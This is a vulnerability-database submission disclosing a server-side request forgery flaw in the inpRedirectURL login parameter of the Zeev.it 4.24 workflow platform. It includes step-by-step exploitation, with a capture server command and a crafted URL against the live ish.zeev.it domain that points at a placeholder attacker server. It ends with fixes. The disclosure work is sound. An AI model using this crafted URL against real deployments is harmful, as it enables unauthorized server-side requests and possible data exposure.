| Título | https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page |
|---|
| Descripción | Proof of Concept (PoC) - SSRF on Zeev.it (Version 4.24)
LINK PoC: https://drive.google.com/file/d/17QAEbzVIjTUj8FDOVMwfl9-7j8LRcK4V/view?usp=sharing
About Zeev.it
Zeev.it is a business process automation (BPM) platform developed by Stoque (https://stoque.com.br/). It allows the creation and management of workflows in an intuitive way. Used by several organizations to optimize internal processes, the system provides functionalities for task approval, document management and integration with other services.
Vulnerability Description
The vulnerability identified in the Zeev.it system allows a Server-Side Request Forgery (SSRF) attack through the inpRedirectURL parameter. This allows an attacker to manipulate requests made by the application server, being able to redirect them to external servers under their control.
Exploitation Scenario
During the analysis of the application, a task for approval was received in the Zeev.it system. The URL provided was:
https://vp4mtgxk.r.us-east-1.awstrack.me/L0/https:%2F%2Fish.zeev.it%2Fmy%2Ftasks/1/01000195488f2e53-225aba4a-ac85-4834-a12f-eb153cb5a24c-000000/fn3qgU20a7bgypJyFAQiBonoJ1s=415
After accessing this URL, it was identified that the application redirects to the following endpoint vulnerable:
https://domain.zeev.it/login?inpLostSession=1&inpRedirectURL=%2F2.0%2Ftask%3Fc%3DV2L3cAEPruaV76FQ2IrzlEgRiHoLXgqU9lFiu%252bLIBYh%252fdUmaQoUwIXKbXcO%252fSsvc
Step-by-Step Exploitation
1. Configure a server to capture SSRF requests.
2. python3 -m http.server 8000
3. Create a malicious URL to force the server to connect to our control server:
4. https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://<YOUR_SERVER>:9000/
5. Monitor incoming requests:
6. SSRF server running on port 8000...
7. SSRF Detected: x.x.x.x -> /?t=m5g3M3eI9/uHe92X...
8. The attack was also successfully performed using Burp Suite and Burp Collaborator, intercepting and modifying the request to test different domains and endpoints.
Impact
This vulnerability could allow an attacker to use the application server as a proxy to access other resources, masking their identity and potentially accessing sensitive information.
Recommendations
• Implement whitelisting to restrict redirects to trusted domains only.
• Validate and sanitize user-supplied input to the inpRedirectURL parameter.
• Monitor HTTP request logs for potential exploit attempts.
|
|---|
| Fuente | ⚠️ https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://x.x.x.x:8000 |
|---|
| Usuario | Samuel Jesus (UID 81288) |
|---|
| Sumisión | 2025-02-28 15:55 (hace 1 Año) |
|---|
| Moderación | 2025-03-11 07:56 (11 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 299217 [Stoque Zeev.it 4.24 Login Page /Login?inpLostSession=1 inpRedirectURL escalada de privilegios] |
|---|
| Puntos | 20 |
|---|